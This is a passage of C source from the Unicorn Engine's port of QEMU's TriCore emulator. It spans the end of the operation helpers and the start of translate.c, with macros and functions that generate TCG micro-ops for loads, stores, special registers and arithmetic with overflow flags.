0xfff00000) + (new_FCX & 0xfffff); /* if (tmp_FCX == LCX) trap(FCD);*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } } void helper_rslcx(CPUTriCoreState *env) { target_ulong ea; target_ulong new_PCXI; /* if (PCXI[19: 0] == 0) then trap(CSU); */ if ((env->PCXI & 0xfffff) == 0) { /* CSU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CSU, GETPC()); } /* if (PCXI.UL == 1) then trap(CTYP); */ if ((env->PCXI & MASK_PCXI_UL) != 0) { /* CTYP trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CTYP, GETPC()); } /* EA = {PCXI.PCXS, 6'b0, PCXI.PCXO, 6'b0}; */ ea = ((env->PCXI & MASK_PCXI_PCXS) << 12) + ((env->PCXI & MASK_PCXI_PCXO) << 6); /* {new_PCXI, A[11], A[2], A[3], D[0], D[1], D[2], D[3], A[4], A[5], A[6], A[7], D[4], D[5], D[6], D[7]} = M(EA, 16 * word); */ restore_context_lower(env, ea, &env->gpr_a[11], &new_PCXI); /* M(EA, word) = FCX; */ cpu_stl_data(env, ea, env->FCX); /* FCX[19: 0] = PCXI[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (env->PCXI & 0x000fffff); /* PCXI = new_PCXI; */ env->PCXI = new_PCXI; } void helper_psw_write(CPUTriCoreState *env, uint32_t arg) { psw_write(env, arg); } uint32_t helper_psw_read(CPUTriCoreState *env) { return psw_read(env); } void helper_uc_tricore_exit(CPUTriCoreState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); 
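/* cpu_loop_exit() unwinds via longjmp back to the outer execution loop and
   does not return. */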
}
unicorn-2.1.1/qemu/target/tricore/translate.c
/* * TriCore emulation for qemu: main translation routines. * * Copyright (c) 2013-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "tricore-opcodes.h" #include "exec/translator.h" #include "exec/gen-icount.h" /* * Unicorn: Special disas state for exiting in the middle of tb. 
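It is used when emulation has to stop between two instructions, for instance after a hook calls uc_emu_stop().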
*/ #define DISAS_UC_EXIT DISAS_TARGET_6 static const char *regnames_a[] = { "a0" , "a1" , "a2" , "a3" , "a4" , "a5" , "a6" , "a7" , "a8" , "a9" , "sp" , "a11" , "a12" , "a13" , "a14" , "a15", }; static const char *regnames_d[] = { "d0" , "d1" , "d2" , "d3" , "d4" , "d5" , "d6" , "d7" , "d8" , "d9" , "d10" , "d11" , "d12" , "d13" , "d14" , "d15", }; typedef struct DisasContext { DisasContextBase base; CPUTriCoreState *env; target_ulong pc; // CCOp cc_op; /* Current CC operation */ target_ulong pc_succ_insn; uint32_t opcode; /* Routine used to access memory */ int mem_idx; uint32_t hflags, saved_hflags; uint64_t features; // Unicorn struct uc_struct *uc; } DisasContext; static int has_feature(DisasContext *ctx, int feature) { return (ctx->features & (1ULL << feature)) != 0; } enum { MODE_LL = 0, MODE_LU = 1, MODE_UL = 2, MODE_UU = 3, }; /* * Functions to generate micro-ops */ /* Makros for generating helpers */ #define gen_helper_1arg(tcg_ctx, name, arg) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define GEN_HELPER_LL(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg00, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg01, arg0); \ tcg_gen_ext16s_tl(tcg_ctx, arg11, arg1); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg11, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_LU(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg10 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg00, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg01, arg0); \ tcg_gen_sari_tl(tcg_ctx, arg11, arg1, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg10, arg1); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg10, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg10); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_UL(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg10 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg00, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg01, arg0); \ tcg_gen_sari_tl(tcg_ctx, arg10, arg1, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg11, arg1); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg10, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg10); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_UU(tcg_ctx, name, ret, arg0, arg1, n) do { \ TCGv arg00 = tcg_temp_new(tcg_ctx); \ TCGv arg01 = tcg_temp_new(tcg_ctx); \ TCGv arg11 = tcg_temp_new(tcg_ctx); \ tcg_gen_sari_tl(tcg_ctx, arg01, arg0, 16); \ tcg_gen_ext16s_tl(tcg_ctx, arg00, arg0); \ tcg_gen_sari_tl(tcg_ctx, arg11, arg1, 16); \ gen_helper_##name(tcg_ctx, ret, arg00, arg01, arg11, arg11, n); \ tcg_temp_free(tcg_ctx, arg00); \ tcg_temp_free(tcg_ctx, arg01); \ tcg_temp_free(tcg_ctx, arg11); \ } while (0) #define GEN_HELPER_RRR(tcg_ctx, name, rl, rh, al1, ah1, arg2) do { \ TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); \ TCGv_i64 arg1 = tcg_temp_new_i64(tcg_ctx); \ \ tcg_gen_concat_i32_i64(tcg_ctx, arg1, al1, ah1); \ 
gen_helper_##name(tcg_ctx, ret, arg1, arg2); \ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); \ \ tcg_temp_free_i64(tcg_ctx, ret); \ tcg_temp_free_i64(tcg_ctx, arg1); \ } while (0) #define GEN_HELPER_RR(tcg_ctx, name, rl, rh, arg1, arg2) do { \ TCGv_i64 ret = tcg_temp_new_i64(tcg_ctx); \ \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, arg2); \ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, ret); \ \ tcg_temp_free_i64(tcg_ctx, ret); \ } while (0) #define EA_ABS_FORMAT(con) (((con & 0x3C000) << 14) + (con & 0x3FFF)) #define EA_B_ABSOLUT(con) (((offset & 0xf00000) << 8) | \ ((offset & 0x0fffff) << 1)) /* For two 32-bit registers used a 64-bit register, the first registernumber needs to be even. Otherwise we trap. */ static inline void generate_trap(DisasContext *ctx, int class, int tin); #define CHECK_REG_PAIR(reg) do { \ if (reg & 0x1) { \ generate_trap(ctx, TRAPC_INSN_ERR, TIN2_OPD); \ } \ } while (0) /* Functions for load/save to/from memory */ static inline void gen_offset_ld(DisasContext *ctx, TCGv r1, TCGv r2, int16_t con, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, con); tcg_gen_qemu_ld_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); tcg_temp_free(tcg_ctx, temp); } static inline void gen_offset_st(DisasContext *ctx, TCGv r1, TCGv r2, int16_t con, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, con); tcg_gen_qemu_st_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); tcg_temp_free(tcg_ctx, temp); } static void gen_st_2regs_64(DisasContext *ctx, TCGv rh, TCGv rl, TCGv address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, temp, rl, rh); // tcg_gen_qemu_st_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LEUQ); tcg_gen_qemu_st_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LE | MO_Q); tcg_temp_free_i64(tcg_ctx, temp); } static void gen_offset_st_2regs(DisasContext *ctx, TCGv rh, TCGv rl, TCGv base, int16_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, base, con); gen_st_2regs_64(ctx, rh, rl, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_ld_2regs_64(DisasContext *ctx, TCGv rh, TCGv rl, TCGv address) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); // tcg_gen_qemu_ld_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LEUQ); tcg_gen_qemu_ld_i64(tcg_ctx, temp, address, ctx->mem_idx, MO_LE | MO_Q); /* write back to two 32 bit regs */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, temp); tcg_temp_free_i64(tcg_ctx, temp); } static void gen_offset_ld_2regs(DisasContext *ctx, TCGv rh, TCGv rl, TCGv base, int16_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, base, con); gen_ld_2regs_64(ctx, rh, rl, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_st_preincr(DisasContext *ctx, TCGv r1, TCGv r2, int16_t off, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, off); tcg_gen_qemu_st_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); tcg_gen_mov_tl(tcg_ctx, r2, temp); tcg_temp_free(tcg_ctx, temp); } static void gen_ld_preincr(DisasContext *ctx, TCGv r1, TCGv r2, int16_t off, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_addi_tl(tcg_ctx, temp, r2, off); tcg_gen_qemu_ld_tl(tcg_ctx, r1, temp, ctx->mem_idx, mop); 
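/* pre-increment addressing: the incremented address is written back to the
   base register only after the access has completed */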
tcg_gen_mov_tl(tcg_ctx, r2, temp); tcg_temp_free(tcg_ctx, temp); } /* M(EA, word) = (M(EA, word) & ~E[a][63:32]) | (E[a][31:0] & E[a][63:32]); */ static void gen_ldmst(DisasContext *ctx, int ereg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); CHECK_REG_PAIR(ereg); /* temp = (M(EA, word) */ tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); /* temp = temp & ~E[a][63:32]) */ tcg_gen_andc_tl(tcg_ctx, temp, temp, tcg_ctx->cpu_gpr_d[ereg+1]); /* temp2 = (E[a][31:0] & E[a][63:32]); */ tcg_gen_and_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[ereg], tcg_ctx->cpu_gpr_d[ereg+1]); /* temp = temp | temp2; */ tcg_gen_or_tl(tcg_ctx, temp, temp, temp2); /* M(EA, word) = temp; */ tcg_gen_qemu_st_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* tmp = M(EA, word); M(EA, word) = D[a]; D[a] = tmp[31:0];*/ static void gen_swap(DisasContext *ctx, int reg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], ea, ctx->mem_idx, MO_LEUL); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], temp); tcg_temp_free(tcg_ctx, temp); } static void gen_cmpswap(DisasContext *ctx, int reg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, temp2, tcg_ctx->cpu_gpr_d[reg+1], temp, tcg_ctx->cpu_gpr_d[reg], temp); tcg_gen_qemu_st_tl(tcg_ctx, temp2, ea, ctx->mem_idx, MO_LEUL); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void gen_swapmsk(DisasContext *ctx, int reg, TCGv ea) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp, ea, ctx->mem_idx, MO_LEUL); tcg_gen_and_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[reg], tcg_ctx->cpu_gpr_d[reg+1]); tcg_gen_andc_tl(tcg_ctx, temp3, temp, tcg_ctx->cpu_gpr_d[reg+1]); tcg_gen_or_tl(tcg_ctx, temp2, temp2, temp3); tcg_gen_qemu_st_tl(tcg_ctx, temp2, ea, ctx->mem_idx, MO_LEUL); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[reg], temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); } /* We generate loads and store to core special function register (csfr) through the function gen_mfcr and gen_mtcr. To handle access permissions, we use 3 makros R, A and E, which allow read-only, all and endinit protected access. These makros also specify in which ISA version the csfr was introduced. 
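Each entry in csfr.def, e.g. R(ADDRESS, REG, FEATURE), therefore expands to a 'case ADDRESS:' that accesses offsetof(CPUTriCoreState, REG) only when FEATURE is available.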
*/ #define R(ADDRESS, REG, FEATURE) \ case ADDRESS: \ if (has_feature(ctx, FEATURE)) { \ tcg_gen_ld_tl(tcg_ctx, ret, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, REG)); \ } \ break; #define A(ADDRESS, REG, FEATURE) R(ADDRESS, REG, FEATURE) #define E(ADDRESS, REG, FEATURE) R(ADDRESS, REG, FEATURE) static inline void gen_mfcr(DisasContext *ctx, TCGv ret, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* since we're caching PSW make this a special case */ if (offset == 0xfe04) { gen_helper_psw_read(tcg_ctx, ret, tcg_ctx->cpu_env); } else { switch (offset) { #include "csfr.def" } } } #undef R #undef A #undef E #define R(ADDRESS, REG, FEATURE) /* don't gen writes to read-only reg, since no execption occurs */ #define A(ADDRESS, REG, FEATURE) R(ADDRESS, REG, FEATURE) \ case ADDRESS: \ if (has_feature(ctx, FEATURE)) { \ tcg_gen_st_tl(tcg_ctx, r1, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, REG)); \ } \ break; /* Endinit protected registers TODO: Since the endinit bit is in a register of a not yet implemented watchdog device, we handle endinit protected registers like all-access registers for now. */ #define E(ADDRESS, REG, FEATURE) A(ADDRESS, REG, FEATURE) static inline void gen_mtcr(DisasContext *ctx, TCGv r1, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if ((ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_SM) { /* since we're caching PSW make this a special case */ if (offset == 0xfe04) { gen_helper_psw_write(tcg_ctx, tcg_ctx->cpu_env, r1); } else { switch (offset) { #include "csfr.def" } } } else { /* generate privilege trap */ } } /* Functions for arithmetic instructions */ static inline void gen_add_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); /* Addition and set V/SV bits */ tcg_gen_add_tl(tcg_ctx, result, r1, r2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, t0, r1, r2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t0); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, t0); } static inline void gen_add64_d(DisasContext *ctx, TCGv_i64 ret, TCGv_i64 r1, TCGv_i64 r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, result, r1, r2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t1, result, r1); tcg_gen_xor_i64(tcg_ctx, t0, r1, r2); tcg_gen_andc_i64(tcg_ctx, t1, t1, t0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* calc AV/SAV bits */ tcg_gen_extrh_i64_i32(tcg_ctx, temp, result); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, temp); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_i64(tcg_ctx, 
ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_addsub64_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, void(*op1)(TCGContext*, TCGv, TCGv, TCGv), void(*op2)(TCGContext*, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv temp4 = tcg_temp_new(tcg_ctx); (*op1)(tcg_ctx, temp, r1_low, r2); /* calc V0 bit */ tcg_gen_xor_tl(tcg_ctx, temp2, temp, r1_low); tcg_gen_xor_tl(tcg_ctx, temp3, r1_low, r2); if (op1 == tcg_gen_add_tl) { tcg_gen_andc_tl(tcg_ctx, temp2, temp2, temp3); } else { tcg_gen_and_tl(tcg_ctx, temp2, temp2, temp3); } (*op2)(tcg_ctx, temp3, r1_high, r3); /* calc V1 bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, temp3, r1_high); tcg_gen_xor_tl(tcg_ctx, temp4, r1_high, r3); if (op2 == tcg_gen_add_tl) { tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp4); } else { tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp4); } /* combine V0/V1 bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp2); /* calc sv bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* write result */ tcg_gen_mov_tl(tcg_ctx, ret_low, temp); tcg_gen_mov_tl(tcg_ctx, ret_high, temp3); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, ret_low, ret_low); tcg_gen_xor_tl(tcg_ctx, temp, temp, ret_low); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, ret_high); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free(tcg_ctx, temp4); } /* ret = r2 + (r1 * r3); */ static inline void gen_madd32_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, r1); tcg_gen_ext_i32_i64(tcg_ctx, t2, r2); tcg_gen_ext_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_add_i64(tcg_ctx, t1, t2, t1); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); /* calc V t1 > 0x7fffffff */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t3, t1, 0x7fffffffLL); /* t1 < -0x80000000 */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t1, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_maddi32_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_madd32_d(ctx, ret, r1, r2, 
temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madd64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); TCGv t4 = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, t1, t2, r1, r3); /* only the add can overflow */ tcg_gen_add2_tl(tcg_ctx, t3, t4, r2_low, r2_high, t1, t2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, t4, r2_high); tcg_gen_xor_tl(tcg_ctx, t1, r2_high, t2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t1); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, t4); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back the result */ tcg_gen_mov_tl(tcg_ctx, ret_low, t3); tcg_gen_mov_tl(tcg_ctx, ret_high, t4); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t4); } static inline void gen_maddu64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, r1); tcg_gen_concat_i32_i64(tcg_ctx, t2, r2_low, r2_high); tcg_gen_extu_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_add_i64(tcg_ctx, t2, t2, t1); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, t2); /* only the add overflows, if t2 < t1 calc V bit */ tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, t2, t2, t1); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_maddi64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_madd64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void 